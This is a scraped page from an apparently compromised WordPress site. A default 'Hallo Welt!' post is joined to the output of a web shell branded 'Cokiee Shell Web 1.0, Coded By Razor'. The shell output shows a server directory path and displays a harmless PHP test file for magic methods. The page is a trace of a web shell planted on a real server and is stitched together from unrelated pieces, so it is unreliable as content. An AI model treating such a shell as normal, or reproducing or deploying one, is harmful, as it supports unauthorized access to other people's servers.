Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/magic_methods_001.phpt |
--TEST-- Testing several magic methods --FILE-- <?php class foo { function __unset($a) { print "unset\n"; var_dump($a); } public function __call($a, $b) { print "call\n"; var_dump($a); } function __clone() { print "clone\n"; } static public function __callstatic($a, $b) { print "callstatic\n"; } public function __tostring() { return 'foo'; } } $a = new foo; $a->sdfdsa(); $a::test(); clone $a; var_dump((string)$a); unset($a->a); ?> --EXPECT-- call string(6) "sdfdsa" callstatic clone string(3) "foo" unset string(1) "a"
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare